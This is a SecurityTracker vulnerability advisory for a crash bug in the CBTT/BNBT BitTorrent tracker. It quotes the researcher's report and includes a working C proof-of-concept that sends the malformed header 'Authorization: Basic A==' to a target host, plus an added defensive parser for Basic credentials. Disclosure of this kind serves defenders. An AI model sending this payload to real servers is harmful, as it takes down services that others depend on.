SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   CBTT
Vendors:   bnbtusermods.sourceforge.net
CBTT Can Be Crashed By Remote Users Sending Specially Crafted HTTP Basic Authentication Headers
SecurityTracker Alert ID:  1010255
SecurityTracker URL:  http://securitytracker.com/id/1010255
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 22 2004
Impact:   Denial of service via network, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): cbtt75_20040515
Description:   badpack3t of SP Research Labs reported a denial of service vulnerability in CBTT. A remote user can cause the service to crash.

A remote user can reportedly send an HTTP GET request containing a specially crafted Basic Authorization header to cause the target service to crash. A demonstration exploit is provided:

Authorization: Basic A==

The report indicates that it may be possible to execute arbitrary code on the target system.

The flaw reportedly resides in 'util.cpp' in the Util_DecodeHTTPAuth() function.

A demonstration exploit is provided in the Source Message.

The original advisory is available at:

http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt

Impact:   A remote user can cause the target service to crash.

A remote user may be able to execute arbitrary code [but that was not confirmed in the report].

Solution:   No solution was available at the time of this entry.
Vendor URL:  bnbtusermods.sourceforge.net/
Cause:   Exception handling error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.
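
Because no fix was available at the time of this entry, the following is an added example (not CBTT/BNBT code and not part of the advisory) of a defensive Basic credential parser. The page does not show the body of Util_DecodeHTTPAuth(), so the checks are assumptions about what a robust replacement should validate; the names DecodeBase64Strict, ParseBasicAuth and the 1024-byte limit are hypothetical.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>

// Strict base64 decode: fails on bad length, characters outside the alphabet,
// misplaced '=' or non-zero leftover bits. "A==" already fails the length check.
bool DecodeBase64Strict(const std::string &in, std::string &out) {
    static const std::string kAlphabet =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    if (in.empty() || in.size() % 4 != 0) return false;
    std::size_t pad = 0;
    while (pad < 2 && in[in.size() - 1 - pad] == '=') ++pad;
    out.clear();
    for (std::size_t i = 0; i < in.size(); i += 4) {
        const bool last = (i + 4 == in.size());
        std::uint32_t v = 0;
        for (std::size_t j = 0; j < 4; ++j) {
            std::size_t idx = 0;  // trailing padding contributes zero bits
            if (!(last && j >= 4 - pad)) {
                idx = kAlphabet.find(in[i + j]);
                if (idx == std::string::npos) return false;
            }
            v = (v << 6) | static_cast<std::uint32_t>(idx);
        }
        if (last && pad && (v & ((1u << (8 * pad)) - 1))) return false;
        const std::size_t n = last ? 3 - pad : 3;  // decoded bytes in this group
        for (std::size_t k = 0; k < n; ++k)
            out.push_back(static_cast<char>((v >> (16 - 8 * k)) & 0xFF));
    }
    return true;
}

// Parses an Authorization header value into user and password. Returns false
// for anything that is not well-formed Basic credentials.
// kMaxToken is an assumed limit, not a value from the page.
bool ParseBasicAuth(const std::string &value, std::string &user, std::string &pass) {
    static const std::string kScheme = "Basic ";
    const std::size_t kMaxToken = 1024;
    if (value.compare(0, kScheme.size(), kScheme) != 0) return false;
    const std::string token = value.substr(kScheme.size());
    if (token.size() > kMaxToken) return false;
    std::string decoded;
    if (!DecodeBase64Strict(token, decoded)) return false;
    const std::size_t colon = decoded.find(':');  // test for npos before substr()
    if (colon == std::string::npos) return false;
    user = decoded.substr(0, colon);
    pass = decoded.substr(colon + 1);
    return true;
}
```

A caller should treat a false return as failed authentication (HTTP 401) and keep serving other requests.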


 Source Message Contents

Subject:  BNBT BitTorrent Tracker Denial Of Service


Please publish:

http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt

Thanks,

----------------------------------------
badpack3t
founder
www.security-protocols.com
----------------------------------------



SP Research Labs Advisory x12
-----------------------------

BNBT BitTorrent Tracker Denial Of Service
-----------------------------------------

Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions

Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/

Date Released - 5.21.2004

------------------------------------
Product Description from the vendor:

BNBT was written by Trevor Hogan. BNBT is a complete port of the original
Python BitTorrent tracker to C++ for speed and efficiency. BNBT also offers
many additional features beyond the original Python BitTorrent tracker, plus
it's easy to use and customizable. BNBT is covered under the GNU Lesser
General Public License (LGPL).

--------
Details:

A specifically crafted HTTP GET request which contains
'Authorization: Basic A==' will cause the BNBT server to crash. It may be
possible to execute arbitrary code. Previous versions are also affected by
this vulnerability. The bug is located in util.cpp in the
Util_DecodeHTTPAuth function.

--------
Exploit:

Attached to this advisory is very basic PoC code which only causes the BNBT server to crash.

--------------
Tested on:
WindowsXP SP1

peace out,

--------------------------
badpack3t
www.security-protocols.com
--------------------------

/****************************/
    PoC to crash the server
/****************************/

/* BNBT BitTorrent Tracker Denial Of Service

    Versions:
    cbtt75_20040515
    Beta 7.5 Release 2 and prior versions

    Vendors:
    http://bnbt.go-dedicated.com/
    http://bnbteasytracker.sourceforge.net/
    http://sourceforge.net/projects/bnbtusermods/

    The bug is located in util.cpp in the Util_DecodeHTTPAuth function.

    Coded and Discovered by:
    badpack3t <badpack3t@security-protocols.com>
    .:sp research labs:.
    www.security-protocols.com
    5.21.2004

    This PoC will only DoS the server to verify if it is vulnerable.
  */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

"GET / HTTP/1.0\r\n"
"Authorization: Basic A==\r\n\r\n";

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent  *pTarget;
	struct sockaddr_in 	sock;
	char *target;
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n <badpack3t@security-protocols.com>\r\n\r\n", argv[0]);
		printf("Usage:\r\n %s <targetip> [targetport] (default is 6969)\r\n\r\n", argv[0]);
		printf("www.security-protocols.com\r\n\r\n", argv[0]);
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

	target = argv[1];
	port = 6969;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 1024;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!\r\n");
		exit(1);
	}

	printf("Resolving Hostnames...\n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failed\n", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...\n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.\n");
		exit(1);
	}

	printf("Connected!...\n");
	printf("Sending Payload...\n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payload\r\n");
		closesocket(mysocket);
		exit(1);
	}

	printf("Payload has been sent! Check if the webserver is dead.\r\n");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}



 
 



Copyright 2021, SecurityGlobal.net LLC